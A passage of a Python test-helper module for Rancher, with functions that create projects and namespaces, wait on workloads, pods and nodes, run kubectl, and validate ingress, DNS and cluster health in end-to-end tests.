    return os_type == "windows"
def random_str():
    """Return a pseudo-random string 'random-<num>-<epoch seconds>'."""
    return 'random-{0}-{1}'.format(random_num(), int(time.time()))
def random_num():
    """Return a random integer in [0, 1000000]."""
    return random.randint(0, 1000000)
def random_int(start, end):
    """Return a random integer in [start, end] (both inclusive)."""
    return random.randint(start, end)
def random_test_name(name="test"):
    """Return *name* suffixed with a random 5-digit number, e.g. 'test-12345'."""
    return name + "-" + str(random_int(10000, 99999))
def get_admin_client():
    """Return a rancher API client authenticated with the admin token."""
    return rancher.Client(url=CATTLE_API_URL, token=ADMIN_TOKEN, verify=False)
def get_user_client():
    """Return a rancher API client authenticated with the standard-user token."""
    return rancher.Client(url=CATTLE_API_URL, token=USER_TOKEN, verify=False)
def get_client_for_token(token, url=CATTLE_API_URL):
    """Return a rancher API client for an arbitrary *token* (and optional url)."""
    return rancher.Client(url=url, token=token, verify=False)
def get_project_client_for_token(project, token):
    """Return a rancher client rooted at *project*'s schema endpoint."""
    schema_url = project.links['self'] + '/schemas'
    return rancher.Client(url=schema_url, token=token, verify=False)
def get_cluster_client_for_token(cluster, token):
    """Return a rancher client rooted at *cluster*'s schema endpoint."""
    schema_url = cluster.links['self'] + '/schemas'
    return rancher.Client(url=schema_url, token=token, verify=False)
def up(cluster, token):
    """Return a rancher client rooted at *cluster*'s schema endpoint.

    NOTE(review): duplicate of get_cluster_client_for_token; kept because
    external callers may use this name.
    """
    c_url = cluster.links['self'] + '/schemas'
    c_client = rancher.Client(url=c_url, token=token, verify=False)
    return c_client
def wait_state(client, obj, state, timeout=DEFAULT_TIMEOUT):
    """Block until *obj* reaches *state*; return the freshly reloaded object."""
    wait_for(lambda: client.reload(obj).state == state, timeout)
    return client.reload(obj)
def wait_for_condition(client, resource, check_function, fail_handler=None,
                       timeout=DEFAULT_TIMEOUT):
    """Reload *resource* every 0.5s until check_function(resource) is truthy.

    On timeout, raises an Exception whose message embeds the check's source
    code (via inspect) plus an optional fail_handler(resource) suffix.
    Returns the last reloaded resource on success.
    """
    start = time.time()
    resource = client.reload(resource)
    while not check_function(resource):
        if time.time() - start > timeout:
            exceptionMsg = 'Timeout waiting for ' + resource.baseType + \
                           ' to satisfy condition: ' + \
                           inspect.getsource(check_function)
            if fail_handler:
                exceptionMsg = exceptionMsg + fail_handler(resource)
            raise Exception(exceptionMsg)
        time.sleep(.5)
        resource = client.reload(resource)
    return resource
def wait_for(callback, timeout=DEFAULT_TIMEOUT, timeout_message=None):
    """Invoke *callback* every 0.5s until it returns neither None nor False.

    Note that other falsy values (0, "") do terminate the wait. Raises
    Exception with *timeout_message* (or a generic message) on timeout.
    """
    start = time.time()
    result = callback()
    while result is None or result is False:
        time.sleep(.5)
        if time.time() - start > timeout:
            raise Exception(timeout_message or 'Timeout waiting for condition')
        result = callback()
    return result
def random_name():
    """Return a random resource name of the form 'test-<5 digits>'."""
    return "test" + "-" + str(random_int(10000, 99999))
def get_setting_value_by_name(name):
    """Fetch the Rancher server setting *name* via the admin API; return its value."""
    settings_url = CATTLE_API_URL + "/settings/" + name
    head = {'Authorization': 'Bearer ' + ADMIN_TOKEN}
    response = requests.get(settings_url, verify=False, headers=head)
    return response.json()["value"]
# Return value is negative if v1 < v2, zero if v1 == v2 and positive if v1 > v2
def compare_versions(v1, v2):
    """Compare two dotted numeric version strings.

    Args:
        v1, v2: versions such as "1.17.4" (every component must be an int)
    Returns:
        1 when v1 > v2, -1 when v1 < v2, 0 when equal.
    """
    # Build each tuple once instead of re-splitting per comparison.
    t1 = tuple(map(int, v1.split(".")))
    t2 = tuple(map(int, v2.split(".")))
    return (t1 > t2) - (t1 < t2)
def create_project_and_ns(token, cluster, project_name=None, ns_name=None):
    """Create a project in *cluster* and a namespace inside it.

    Returns:
        (project, namespace) tuple.
    """
    server_url = cluster.links['self'].split("/clusters")[0]
    client = get_client_for_token(token, server_url)
    p = create_project(client, cluster, project_name)
    c_client = get_cluster_client_for_token(cluster, token)
    ns = create_ns(c_client, cluster, p, ns_name)
    return p, ns
def create_project(client, cluster, project_name=None):
    """Create a project (random name when none given) and wait until active."""
    if project_name is None:
        project_name = random_name()
    p = client.create_project(name=project_name,
                              clusterId=cluster.id)
    # give the backend a moment before polling availability -- TODO confirm necessary
    time.sleep(5)
    p = wait_until_available(client, p)
    assert p.state == 'active'
    return p
def create_project_with_pspt(client, cluster, pspt):
    """Create an active project and bind the given pod security policy template."""
    p = client.create_project(name=random_name(),
                              clusterId=cluster.id)
    p = wait_until_available(client, p)
    assert p.state == 'active'
    return set_pspt_for_project(p, client, pspt)
def set_pspt_for_project(project, client, pspt):
    """Attach PSPT *pspt* to *project*; wait until the project is active again."""
    project.setpodsecuritypolicytemplate(podSecurityPolicyTemplateId=pspt.id)
    project = wait_until_available(client, project)
    assert project.state == 'active'
    return project
def create_ns(client, cluster, project, ns_name=None):
    """Create a namespace in *project* (random name when none) and wait active."""
    if ns_name is None:
        ns_name = random_name()
    ns = client.create_namespace(name=ns_name,
                                 clusterId=cluster.id,
                                 projectId=project.id)
    wait_for_ns_to_become_active(client, ns)
    ns = client.reload(ns)
    assert ns.state == 'active'
    return ns
def assign_members_to_cluster(client, user, cluster, role_template_id):
    """Bind *user* to *cluster* with the given role template; return the CRTB."""
    crtb = client.create_cluster_role_template_binding(
        clusterId=cluster.id,
        roleTemplateId=role_template_id,
        subjectKind="User",
        userId=user.id)
    return crtb
def assign_members_to_project(client, user, project, role_template_id):
    """Bind *user* to *project* with the given role template; return the PRTB."""
    prtb = client.create_project_role_template_binding(
        projectId=project.id,
        roleTemplateId=role_template_id,
        subjectKind="User",
        userId=user.id)
    return prtb
def change_member_role_in_cluster(client, user, crtb, role_template_id):
    """Update an existing cluster role binding to *role_template_id*."""
    crtb = client.update(
        crtb,
        roleTemplateId=role_template_id,
        userId=user.id)
    return crtb
def change_member_role_in_project(client, user, prtb, role_template_id):
    """Update an existing project role binding to *role_template_id*."""
    prtb = client.update(
        prtb,
        roleTemplateId=role_template_id,
        userId=user.id)
    return prtb
def create_kubeconfig(cluster, file_name=kube_fname):
    """Generate *cluster*'s kubeconfig and write it to *file_name*.

    Args:
        cluster: rancher cluster object exposing generateKubeconfig()
        file_name: destination path (defaults to the module-level kube_fname)
    """
    generateKubeConfigOutput = cluster.generateKubeconfig()
    print(generateKubeConfigOutput.config)
    # with-statement guarantees the file is closed even if the write fails
    with open(file_name, "w") as f:
        f.write(generateKubeConfigOutput.config)
def validate_psp_error_worklaod(p_client, workload, error_message):
    """Assert the workload errors while updating with *error_message* in its status.

    NOTE(review): "worklaod" typo kept -- external callers use this name.
    """
    workload = wait_for_wl_transitioning(p_client, workload)
    assert workload.state == "updating"
    assert workload.transitioning == "error"
    print(workload.transitioningMessage)
    assert error_message in workload.transitioningMessage
def validate_all_workload_image_from_rancher(project_client, ns, pod_count=1,
                                             ignore_pod_count=False,
                                             deployment_list=None,
                                             daemonset_list=None,
                                             cronjob_list=None):
    """Verify that exactly the given workloads exist in *ns*, that every
    container image is a rancher/* image, and that each workload validates
    according to its kind (deployment / daemonSet / cronJob).
    """
    if cronjob_list is None:
        cronjob_list = []
    if daemonset_list is None:
        daemonset_list = []
    if deployment_list is None:
        deployment_list = []
    workload_list = deployment_list + daemonset_list + cronjob_list
    wls = project_client.list_workload(namespaceId=ns.id).data
    assert len(workload_list) == len(wls), \
        "Expected {} workload(s) to be present in {} namespace " \
        "but there were {}".format(len(workload_list), ns.name, len(wls))
    for workload_name in workload_list:
        workloads = project_client.list_workload(name=workload_name,
                                                 namespaceId=ns.id).data
        # duplicates in workload_list are allowed; counts must match
        assert len(workloads) == workload_list.count(workload_name), \
            "Expected {} workload(s) to be present with name {} " \
            "but there were {}".format(workload_list.count(workload_name),
                                       workload_name, len(workloads))
        for workload in workloads:
            for container in workload.containers:
                assert str(container.image).startswith("rancher/")
            if workload_name in deployment_list:
                validate_workload(project_client, workload, "deployment",
                                  ns.name, pod_count=pod_count,
                                  ignore_pod_count=ignore_pod_count)
                deployment_list.remove(workload_name)
            if workload_name in daemonset_list:
                validate_workload(project_client, workload, "daemonSet",
                                  ns.name, pod_count=pod_count,
                                  ignore_pod_count=ignore_pod_count)
                daemonset_list.remove(workload_name)
            if workload_name in cronjob_list:
                validate_workload(project_client, workload, "cronJob",
                                  ns.name, pod_count=pod_count,
                                  ignore_pod_count=ignore_pod_count)
                cronjob_list.remove(workload_name)
    # Final assertion to ensure all expected workloads have been validated
    assert not deployment_list + daemonset_list + cronjob_list
def validate_workload(p_client, workload, type, ns_name, pod_count=1,
                      wait_for_cron_pods=60, ignore_pod_count=False):
    """Wait for *workload* to be active, then cross-check its pods through
    both the rancher API and kubectl for the given workload *type*.
    """
    workload = wait_for_wl_to_active(p_client, workload)
    assert workload.state == "active"
    # For cronjob, wait for the first pod to get created after
    # scheduled wait time
    if type == "cronJob":
        time.sleep(wait_for_cron_pods)
    if ignore_pod_count:
        pods = p_client.list_pod(workloadId=workload.id).data
    else:
        pods = wait_for_pods_in_workload(p_client, workload, pod_count)
        assert len(pods) == pod_count
        pods = p_client.list_pod(workloadId=workload.id).data
        assert len(pods) == pod_count
    for pod in pods:
        p = wait_for_pod_to_running(p_client, pod)
        assert p["status"]["phase"] == "Running"
    wl_result = execute_kubectl_cmd(
        "get " + type + " " + workload.name + " -n " + ns_name)
    if type == "deployment" or type == "statefulSet":
        assert wl_result["status"]["readyReplicas"] == len(pods)
    if type == "daemonSet":
        assert wl_result["status"]["currentNumberScheduled"] == len(pods)
    if type == "cronJob":
        assert len(wl_result["status"]["active"]) >= len(pods)
def validate_workload_with_sidekicks(p_client, workload, type, ns_name,
                                     pod_count=1):
    """Like validate_workload, but additionally assert that every pod runs
    exactly two containers (main + sidekick) and both are in 'running' state.
    """
    workload = wait_for_wl_to_active(p_client, workload)
    assert workload.state == "active"
    pods = wait_for_pods_in_workload(p_client, workload, pod_count)
    assert len(pods) == pod_count
    for pod in pods:
        wait_for_pod_to_running(p_client, pod)
    wl_result = execute_kubectl_cmd(
        "get " + type + " " + workload.name + " -n " + ns_name)
    assert wl_result["status"]["readyReplicas"] == pod_count
    for key, value in workload.workloadLabels.items():
        label = key + "=" + value
        get_pods = "get pods -l" + label + " -n " + ns_name
        execute_kubectl_cmd(get_pods)
        pods_result = execute_kubectl_cmd(get_pods)
        assert len(pods_result["items"]) == pod_count
        for pod in pods_result["items"]:
            assert pod["status"]["phase"] == "Running"
            assert len(pod["status"]["containerStatuses"]) == 2
            assert "running" in pod["status"]["containerStatuses"][0]["state"]
            assert "running" in pod["status"]["containerStatuses"][1]["state"]
def validate_workload_paused(p_client, workload, expectedstatus):
    """Assert the workload's paused flag equals *expectedstatus*."""
    workloadStatus = p_client.list_workload(uuid=workload.uuid).data[0].paused
    assert workloadStatus == expectedstatus
def validate_pod_images(expectedimage, workload, ns_name):
    """Assert every pod selected by the workload's labels runs *expectedimage*."""
    for key, value in workload.workloadLabels.items():
        label = key + "=" + value
        get_pods = "get pods -l" + label + " -n " + ns_name
        pods = execute_kubectl_cmd(get_pods)
        for pod in pods["items"]:
            # only the first container is checked
            assert pod["spec"]["containers"][0]["image"] == expectedimage
def validate_pods_are_running_by_id(expectedpods, workload, ns_name):
    """Assert each pod in *expectedpods* still exists among the workload's pods.

    NOTE(review): despite the name, only pod-name presence is checked here,
    not the Running phase.
    """
    for key, value in workload.workloadLabels.items():
        label = key + "=" + value
        get_pods = "get pods -l" + label + " -n " + ns_name
        pods = execute_kubectl_cmd(get_pods)
        curpodnames = []
        for pod in pods["items"]:
            curpodnames.append(pod["metadata"]["name"])
        for expectedpod in expectedpods["items"]:
            assert expectedpod["metadata"]["name"] in curpodnames
def validate_workload_image(client, workload, expectedImage, ns):
    """Assert the workload's first container and its pods all use *expectedImage*."""
    workload = client.list_workload(uuid=workload.uuid).data[0]
    assert workload.containers[0].image == expectedImage
    validate_pod_images(expectedImage, workload, ns.name)
def execute_kubectl_cmd(cmd, json_out=True, stderr=False,
                        kubeconfig=kube_fname):
    """Run `kubectl <cmd>` against *kubeconfig*.

    Args:
        cmd: kubectl arguments (without the leading 'kubectl')
        json_out: append '-o json' and parse the output as JSON
        stderr: capture stderr too (uses run_command_with_stderr)
        kubeconfig: path to the kubeconfig file
    Returns:
        Parsed JSON when json_out, otherwise the raw command output.
    """
    command = 'kubectl --kubeconfig {0} {1}'.format(
        kubeconfig, cmd)
    if json_out:
        command += ' -o json'
    print("run cmd: \t{0}".format(command))
    if stderr:
        result = run_command_with_stderr(command, False)
    else:
        result = run_command(command, False)
    print("returns: \t{0}".format(result))
    if json_out:
        result = json.loads(result)
    return result
def run_command(command, log_out=True):
    """Run *command* through the shell and return its stdout.

    Args:
        command: shell command line to execute
        log_out: when True, echo the command before running it
    Returns:
        Captured stdout as str, or None when the command exits non-zero.
    """
    if log_out:
        print("run cmd: \t{0}".format(command))
    try:
        return subprocess.check_output(command, shell=True, text=True)
    except subprocess.CalledProcessError:
        # Failure is swallowed by design: callers treat None as "command failed".
        return None
def run_command_with_stderr(command, log_out=True):
    """Run *command* in a shell, capturing stderr.

    Returns stdout (bytes) on success; on failure returns the captured
    stderr (bytes) after printing the non-zero return code and output.
    """
    if log_out:
        print("run cmd: \t{0}".format(command))
    try:
        output = subprocess.check_output(command, shell=True,
                                         stderr=subprocess.PIPE)
        returncode = 0
    except subprocess.CalledProcessError as err:
        output, returncode = err.stderr, err.returncode
    if log_out:
        print("return code: \t{0}".format(returncode))
    if returncode != 0:
        print("output: \t{0}".format(output))
    return output
def wait_for_wl_to_active(client, workload, timeout=DEFAULT_TIMEOUT):
    """Poll every 0.5s until the workload's state is 'active'; return it.

    Raises AssertionError on timeout.
    """
    start = time.time()
    workloads = client.list_workload(uuid=workload.uuid).data
    assert len(workloads) == 1
    wl = workloads[0]
    while wl.state != "active":
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for state to get to active")
        time.sleep(.5)
        workloads = client.list_workload(uuid=workload.uuid).data
        assert len(workloads) == 1
        wl = workloads[0]
    return wl
def wait_for_ingress_to_active(client, ingress, timeout=DEFAULT_TIMEOUT):
    """Poll every 0.5s until the ingress' state is 'active'; return it.

    Raises AssertionError on timeout.
    """
    start = time.time()
    ingresses = client.list_ingress(uuid=ingress.uuid).data
    assert len(ingresses) == 1
    wl = ingresses[0]
    while wl.state != "active":
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for state to get to active")
        time.sleep(.5)
        ingresses = client.list_ingress(uuid=ingress.uuid).data
        assert len(ingresses) == 1
        wl = ingresses[0]
    return wl
def wait_for_wl_transitioning(client, workload, timeout=DEFAULT_TIMEOUT,
                              state="error"):
    """Poll until the workload's *transitioning* field equals *state*; return it.

    NOTE(review): the timeout message mentions 'active' but this waits on the
    transitioning flag, not the state field.
    """
    start = time.time()
    workloads = client.list_workload(uuid=workload.uuid).data
    assert len(workloads) == 1
    wl = workloads[0]
    while wl.transitioning != state:
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for state to get to active")
        time.sleep(.5)
        workloads = client.list_workload(uuid=workload.uuid).data
        assert len(workloads) == 1
        wl = workloads[0]
    return wl
def wait_for_pod_to_running(client, pod, timeout=DEFAULT_TIMEOUT):
    """Poll every 0.5s until the pod's state is 'running'; return the pod.

    Raises AssertionError on timeout.
    """
    start = time.time()
    pods = client.list_pod(uuid=pod.uuid).data
    assert len(pods) == 1
    p = pods[0]
    while p.state != "running":
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for state to get to active")
        time.sleep(.5)
        pods = client.list_pod(uuid=pod.uuid).data
        assert len(pods) == 1
        p = pods[0]
    return p
def get_schedulable_nodes(cluster, client=None, os_type=TEST_OS):
    """Return worker nodes of *cluster* whose OS label matches *os_type*.

    For k3s clusters, control-plane nodes are appended as well since they
    are schedulable there.
    """
    if not client:
        client = get_user_client()
    nodes = client.list_node(clusterId=cluster.id).data
    schedulable_nodes = []
    for node in nodes:
        if node.worker and (not node.unschedulable):
            for key, val in node.labels.items():
                # Either one of the labels should be present on the node
                if key == 'kubernetes.io/os' or key == 'beta.kubernetes.io/os':
                    if val == os_type:
                        schedulable_nodes.append(node)
                        break
        # Including master in list of nodes as master is also schedulable
        if 'k3s' in cluster.version["gitVersion"] and node.controlPlane:
            schedulable_nodes.append(node)
    return schedulable_nodes
def get_etcd_nodes(cluster, client=None):
    """Return the nodes of *cluster* that carry the etcd role."""
    if not client:
        client = get_user_client()
    nodes = client.list_node(clusterId=cluster.id).data
    return [node for node in nodes if node.etcd]
def get_role_nodes(cluster, role, client=None):
    """Return the nodes of *cluster* that carry *role*.

    Args:
        cluster: cluster object
        role: one of "etcd", "control", "worker" (anything else yields [])
        client: optional rancher client; defaults to the user client
    """
    if not client:
        client = get_user_client()
    nodes = client.list_node(clusterId=cluster.id).data
    predicate = {
        "etcd": lambda n: n.etcd,
        "control": lambda n: n.controlPlane,
        "worker": lambda n: n.worker,
    }.get(role)
    if predicate is None:
        return []
    return [node for node in nodes if predicate(node)]
def validate_ingress(p_client, cluster, workloads, host, path,
                     insecure_redirect=False):
    """Curl the ingress URL on every schedulable linux node and verify each
    backing pod answers (see validate_http_response round-robin check).
    """
    # give the ingress controller time to program the rules -- TODO confirm needed
    time.sleep(10)
    curl_args = " "
    if (insecure_redirect):
        curl_args = " -L --insecure "
    if len(host) > 0:
        curl_args += " --header 'Host: " + host + "'"
    nodes = get_schedulable_nodes(cluster, os_type="linux")
    target_name_list = get_target_names(p_client, workloads)
    for node in nodes:
        host_ip = resolve_node_ip(node)
        url = "http://" + host_ip + path
        if not insecure_redirect:
            wait_until_ok(url, timeout=300, headers={
                "Host": host
            })
        cmd = curl_args + " " + url
        validate_http_response(cmd, target_name_list)
def validate_ingress_using_endpoint(p_client, ingress, workloads,
                                    timeout=300,
                                    certcheck=False, is_insecure=False):
    """Wait until the ingress publishes a public endpoint, build its URL,
    then verify every backing pod answers through it.
    """
    target_name_list = get_target_names(p_client, workloads)
    start = time.time()
    fqdn_available = False
    url = None
    while not fqdn_available:
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for endpoint to be available")
        time.sleep(.5)
        ingress_list = p_client.list_ingress(uuid=ingress.uuid).data
        assert len(ingress_list) == 1
        ingress = ingress_list[0]
        if hasattr(ingress, 'publicEndpoints'):
            for public_endpoint in ingress.publicEndpoints:
                # accept the endpoint once its hostname matches the ingress
                # name (or unconditionally when doing a cert check)
                if public_endpoint["hostname"].startswith(ingress.name) \
                        or certcheck:
                    fqdn_available = True
                    url = \
                        public_endpoint["protocol"].lower() + "://" + \
                        public_endpoint["hostname"]
                    if "path" in public_endpoint.keys():
                        url += public_endpoint["path"]
    # small settle time before hitting the endpoint -- TODO confirm needed
    time.sleep(10)
    validate_http_response(url, target_name_list, insecure=is_insecure)
def get_target_names(p_client, workloads):
    """Collect the pod names backing each workload in *workloads*."""
    names = []
    for workload in workloads:
        pod_list = p_client.list_pod(workloadId=workload.id).data
        names.extend(pod.name for pod in pod_list)
    print("target name list:" + str(names))
    return names
def get_endpoint_url_for_workload(p_client, workload, timeout=600):
    """Wait for the workload to publish a public endpoint and return its
    'http://<address>:<port>' URL. Raises AssertionError on timeout.
    """
    fqdn_available = False
    url = ""
    start = time.time()
    while not fqdn_available:
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for endpoint to be available")
        time.sleep(.5)
        workload_list = p_client.list_workload(uuid=workload.uuid).data
        assert len(workload_list) == 1
        workload = workload_list[0]
        if hasattr(workload, 'publicEndpoints'):
            assert len(workload.publicEndpoints) > 0
            # first endpoint/address only
            url = "http://"
            url = url + workload.publicEndpoints[0]["addresses"][0] + ":"
            url = url + str(workload.publicEndpoints[0]["port"])
            fqdn_available = True
    return url
def wait_until_lb_is_active(url, timeout=300):
    """Poll *url* until the load balancer accepts connections or timeout."""
    start = time.time()
    while check_for_no_access(url):
        time.sleep(.5)
        print("No access yet")
        if time.time() - start > timeout:
            raise Exception('Timed out waiting for LB to become active')
    return
def check_for_no_access(url, verify=False):
    """Return True when *url* refuses connections, False when reachable."""
    try:
        requests.get(url, verify=verify)
        return False
    except requests.ConnectionError:
        print("Connection Error - " + url)
        return True
def wait_until_active(url, timeout=120):
    """Poll *url* until it accepts connections; raise Exception on timeout."""
    start = time.time()
    while check_for_no_access(url):
        time.sleep(.5)
        print("No access yet")
        if time.time() - start > timeout:
            raise Exception('Timed out waiting for url '
                            'to become active')
    return
def wait_until_ok(url, timeout=120, headers=None):
    """Poll *url* with HEAD requests until it answers HTTP 200.

    Args:
        url: endpoint to probe
        timeout: seconds before giving up
        headers: optional extra request headers (None default replaces the
                 former mutable {} default)
    Raises:
        Exception: when the deadline passes without a 200 response.
    """
    if headers is None:
        headers = {}
    start = time.time()
    while not check_if_ok(url, headers=headers):
        time.sleep(.5)
        if time.time() - start > timeout:
            raise Exception(
                'Timed out waiting for {0} to become ok'.format(url)
            )
    return
def wait_for_status_code(url, expected_code=200, timeout=DEFAULT_TIMEOUT):
    """Poll *url* every second until it returns *expected_code*.

    Raises Exception on timeout.
    """
    start = time.time()
    r = requests.get(url, verify=False)
    while r.status_code != expected_code:
        time.sleep(1)
        r = requests.get(url, verify=False)
        if time.time() - start > timeout:
            raise Exception(
                'Timed out waiting for status code{0}'.format(expected_code))
    return
def check_if_ok(url, verify=False, headers=None):
    """Return True when a HEAD request to *url* answers HTTP 200.

    Connection errors are reported and mapped to False. The former mutable
    {} default for *headers* is replaced with None.
    """
    if headers is None:
        headers = {}
    try:
        res = requests.head(url, verify=verify, headers=headers)
        if res.status_code == 200:
            return True
        return False
    except requests.ConnectionError:
        print("Connection Error - " + url)
        return False
def validate_http_response(cmd, target_name_list, client_pod=None,
                           insecure=False):
    """Hit the endpoint repeatedly (curl from this host, or wget/PowerShell
    from *client_pod*) until every pod name in *target_name_list* has been
    seen in a response; assert full coverage within 5x attempts per target.
    """
    if client_pod is None and cmd.startswith("http://"):
        wait_until_active(cmd, 60)
    target_hit_list = target_name_list[:]
    count = 5 * len(target_name_list)
    for i in range(1, count):
        if len(target_hit_list) == 0:
            break
        if client_pod is None:
            curl_cmd = "curl " + cmd
            if insecure:
                # tab acts as whitespace for the shell -- presumably intentional; TODO confirm
                curl_cmd += "\t--insecure"
            result = run_command(curl_cmd)
        else:
            if is_windows():
                wget_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
                           '"& {{ (Invoke-WebRequest -UseBasicParsing -Uri ' \
                           '{0}).Content }}"'.format(cmd)
            else:
                wget_cmd = "wget -qO- " + cmd
            result = kubectl_pod_exec(client_pod, wget_cmd)
            result = result.decode()
        result = result.rstrip()
        assert result in target_name_list
        if result in target_hit_list:
            target_hit_list.remove(result)
    print("After removing all, the rest is: ", target_hit_list)
    assert len(target_hit_list) == 0
def validate_cluster(client, cluster, intermediate_state="provisioning",
                     check_intermediate_state=True, skipIngresscheck=True,
                     nodes_not_in_active_state=None, k8s_version="",
                     userToken=USER_TOKEN):
    """End-to-end validation of a provisioned cluster.

    Waits for the cluster to reach its final state, writes a kubeconfig,
    optionally checks the k8s version and component statuses, verifies the
    System project's workloads are active, deploys a daemonSet test workload
    and (optionally) exercises service discovery plus an ingress rule.
    Returns the validated cluster object.
    """
    # None default replaces the former mutable [] default argument.
    if nodes_not_in_active_state is None:
        nodes_not_in_active_state = []
    # Allow sometime for the "cluster_owner" CRTB to take effect
    time.sleep(5)
    cluster = validate_cluster_state(
        client, cluster,
        check_intermediate_state=check_intermediate_state,
        intermediate_state=intermediate_state,
        nodes_not_in_active_state=nodes_not_in_active_state)
    create_kubeconfig(cluster)
    if k8s_version != "":
        check_cluster_version(cluster, k8s_version)
    if hasattr(cluster, 'rancherKubernetesEngineConfig'):
        check_cluster_state(len(get_role_nodes(cluster, "etcd", client)))
    # check all workloads under the system project are active
    print("checking if workloads under the system project are active")
    sys_project = client.list_project(name='System',
                                      clusterId=cluster.id).data[0]
    sys_p_client = get_project_client_for_token(sys_project, userToken)
    for wl in sys_p_client.list_workload().data:
        # to help run KDM job faster (when there are many clusters),
        # timeout=300 is set
        wait_for_wl_to_active(sys_p_client, wl, timeout=300)
    # Create Daemon set workload and have an Ingress with Workload
    # rule pointing to this daemonSet
    project, ns = create_project_and_ns(userToken, cluster)
    p_client = get_project_client_for_token(project, userToken)
    con = [{"name": "test1",
            "image": TEST_IMAGE}]
    name = random_test_name("default")
    workload = p_client.create_workload(name=name,
                                        containers=con,
                                        namespaceId=ns.id,
                                        daemonSetConfig={})
    validate_workload(p_client, workload, "daemonSet", ns.name,
                      len(get_schedulable_nodes(cluster, client)))
    if not skipIngresscheck:
        pods = p_client.list_pod(workloadId=workload["id"]).data
        scale = len(pods)
        # test service discovery
        validate_service_discovery(workload, scale, p_client, ns, pods)
        host = "test" + str(random_int(10000, 99999)) + ".com"
        path = "/name.html"
        rule = {"host": host,
                "paths":
                    [{"workloadIds": [workload.id], "targetPort": "80"}]}
        ingress = p_client.create_ingress(name=name,
                                          namespaceId=ns.id,
                                          rules=[rule])
        wait_for_ingress_to_active(p_client, ingress)
        validate_ingress(p_client, cluster, [workload], host, path)
    return cluster
def check_cluster_version(cluster, version):
    """Assert rancher's applied k8s version and kubectl's server version match *version*."""
    cluster_k8s_version = \
        cluster.appliedSpec["rancherKubernetesEngineConfig"][
            "kubernetesVersion"]
    assert cluster_k8s_version == version, \
        "cluster_k8s_version: " + cluster_k8s_version + \
        " Expected: " + version
    # Strip the rancher build suffix (e.g. "v1.17.4-rancher1-1" -> "v1.17.4").
    # NOTE(review): assumes *version* contains a "-"; find() == -1 would drop
    # the last character -- confirm against the accepted version format.
    expected_k8s_version = version[:version.find("-")]
    k8s_version = execute_kubectl_cmd("version")
    kubectl_k8s_version = k8s_version["serverVersion"]["gitVersion"]
    assert kubectl_k8s_version == expected_k8s_version, \
        "kubectl version: " + kubectl_k8s_version + \
        " Expected: " + expected_k8s_version
def check_cluster_state(etcd_count):
    """Verify componentstatuses: scheduler, controller-manager and one
    etcd-<i> entry per etcd node must all be present and Healthy.
    """
    css = execute_kubectl_cmd("get cs")["items"]
    expected = ["scheduler", "controller-manager"] + [
        "etcd-" + str(i) for i in range(etcd_count)]
    print("components to check - " + str(expected))
    for status in css:
        component_name = status["metadata"]["name"]
        assert component_name in expected
        expected.remove(component_name)
        assert status["conditions"][0]["status"] == "True"
        assert status["conditions"][0]["type"] == "Healthy"
    assert len(expected) == 0
def validate_dns_record(pod, record, expected):
    """Resolve the record's cluster-local FQDN from *pod*; check *expected* values."""
    # requires pod with `dig` available - TEST_IMAGE
    host = '{0}.{1}.svc.cluster.local'.format(
        record["name"], record["namespaceId"])
    validate_dns_entry(pod, host, expected)
def validate_dns_entry(pod, host, expected):
    """Check from inside *pod* that *host* pings and resolves to *expected*.

    Requires a pod image with `dig` available (TEST_IMAGE); Windows pods
    are delegated to validate_dns_entry_windows.
    """
    if is_windows():
        validate_dns_entry_windows(pod, host, expected)
        return
    ping_output = str(
        kubectl_pod_exec(pod, 'ping -c 1 -W 1 {0}'.format(host)))
    # at least one expected address must appear in the ping output
    assert any(value in ping_output for value in expected)
    assert " 0% packet loss" in ping_output
    dig_output = str(kubectl_pod_exec(pod, 'dig {0} +short'.format(host)))
    # dig must return every expected address
    for value in expected:
        assert value in dig_output
def validate_dns_entry_windows(pod, host, expected):
    """Windows variant of validate_dns_entry: ping plus Resolve-DnsName."""
    def ping_succeeds():
        out = str(kubectl_pod_exec(pod, 'ping -w 1 -n 1 {0}'.format(host)))
        seen = any(value in out for value in expected)
        return seen and (" (0% loss)" in out)
    wait_for(callback=ping_succeeds,
             timeout_message="Failed to ping {0}".format(host))

    def resolve_succeeds():
        cmd = 'powershell -NoLogo -NonInteractive -Command ' \
              '"& {{ (Resolve-DnsName {0}).IPAddress }}"'.format(host)
        out = str(kubectl_pod_exec(pod, cmd))
        return all(value in out for value in expected)
    wait_for(callback=resolve_succeeds,
             timeout_message="Failed to resolve {0}".format(host))
def validate_dns_record_deleted(client, dns_record, timeout=DEFAULT_TIMEOUT):
    """
    Checks whether dns_record got deleted successfully.
    Validates if dns_record is null in for current object client.
    @param client: Object client use to create dns_record
    @param dns_record: record object subjected to be deleted
    @param timeout: Max time to keep checking whether record is deleted or not
    """
    time.sleep(2)
    deadline = time.time() + timeout
    while True:
        remaining = client.list_dns_record(name=dns_record.name, ).data
        if len(remaining) == 0:
            return
        if time.time() > deadline:
            raise AssertionError(
                "Timed out waiting for record {} to be deleted"
                "".format(dns_record.name))
        time.sleep(.5)
def wait_for_nodes_to_become_active(client, cluster, exception_list=None,
                                    retry_count=0):
    """Wait until every node of *cluster* (minus exceptions) is active.

    @param client: management client used to list nodes
    @param cluster: cluster whose nodes are checked
    @param exception_list: requestedHostname values to skip
    @param retry_count: internal recursion counter; nodes auto-deleted by
        node pools force a re-evaluation of the node list, at most 5 times
    """
    # None default instead of a shared mutable [] default argument.
    if exception_list is None:
        exception_list = []
    nodes = client.list_node(clusterId=cluster.id).data
    node_auto_deleted = False
    for node in nodes:
        if node.requestedHostname not in exception_list:
            node = wait_for_node_status(client, node, "active")
            if node is None:
                print("Need to re-evalauate new node list")
                node_auto_deleted = True
                retry_count += 1
                print("Retry Count:" + str(retry_count))
    if node_auto_deleted and retry_count < 5:
        wait_for_nodes_to_become_active(client, cluster, exception_list,
                                        retry_count)
def wait_for_node_status(client, node, state):
    """Poll until the node identified by node.uuid reaches *state*.

    Returns the passed-in *node* object once the state is reached, or None
    if the node disappeared (e.g. auto-deleted node-pool members).
    """
    uuid = node.uuid
    start = time.time()
    _GONE = object()

    def current_state():
        # _GONE signals that the node no longer exists in the API.
        matches = client.list_node(uuid=uuid).data
        if len(matches) == 1:
